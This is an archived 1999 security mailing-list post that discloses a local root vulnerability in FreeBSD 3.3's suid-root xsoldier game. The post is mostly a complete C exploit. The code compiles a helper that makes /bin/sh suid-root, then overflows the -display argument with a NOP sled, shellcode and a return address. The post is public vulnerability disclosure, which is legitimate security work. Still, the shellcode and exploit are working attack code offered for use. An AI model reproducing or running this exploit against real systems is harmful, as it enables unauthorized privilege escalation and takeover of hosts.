FreeBSD 3.3 xsoldier root exploit

From: Brock Tellier (btellierat_private)
Date: Wed Dec 15 1999 - 16:11:36 PST

Next message: Wakko Ellington Warner-Warner III: "Oops, my apologies."

Previous message: Iván Arce: "Re: SSH-1.2.27 & RSAREF2 exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Greetings,

OVERVIEW
A vulnerability in FreeBSD 3.3's xsoldier will allow any user to gain root
access.  This user does not have to have a valid $DISPLAY to exploit this.

BACKGROUND
Only FreeBSD 3.3-RELEASE has been tested.  xsoldier, suid-root by default, was
installed as part of the X11 games packages via /stand/sysinstall.

DETAILS
More problems with FreeBSD 3.3 ports.  This time with xsoldier, a suid-root
game.  A simple overflow in the -display option allows any user to gain root. 
Although xsoldier only runs under X, a long -display arg on the CL will allow
us to gain root.

--- xsoldierx.c ---
/* 
 * xsoldier exploit for Freebsd-3.3-RELEASE
 * Drops a suid root shell in /bin/sh
 * Brock Tellier btellierat_private
 */


#include <stdio.h>

char shell[]= /* mudgeat_private */
  "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
   "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
   "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
   "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui";

#define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n"

void buildui() {
FILE *fp;
  char cc[100];
  fp = fopen("/tmp/ui.c", "w");
  fprintf(fp, CODE);
  fclose(fp);
  snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
  system(cc);
}

main (int argc, char *argv[] ) {
 int x = 0;
 int y = 0;
 int offset = 0;
 int bsize = 4400;
 char buf[bsize];
 int eip = 0xbfbfdb65; /* works for me */
 buildui();

 if (argv[1]) { 
   offset = atoi(argv[1]);
   eip = eip + offset;
 }
 fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE
<btellierat_private>\n");
 fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n");
 fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);
 
 for ( x = 0; x < 4325; x++) buf[x] = 0x90;
     fprintf(stderr, "NOPs to %d\n", x);
 
 for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
     fprintf(stderr, "Shellcode to %d\n",x);
  
  buf[x++] =  eip & 0x000000ff;
  buf[x++] = (eip & 0x0000ff00) >> 8;
  buf[x++] = (eip & 0x00ff0000) >> 16;
  buf[x++] = (eip & 0xff000000) >> 24;
     fprintf(stderr, "eip to %d\n",x);

 buf[bsize]='\0';

execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL);

}

-------

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellierat_private

____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1

Next message: Wakko Ellington Warner-Warner III: "Oops, my apologies."
Previous message: Iván Arce: "Re: SSH-1.2.27 & RSAREF2 exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:21:21 PDT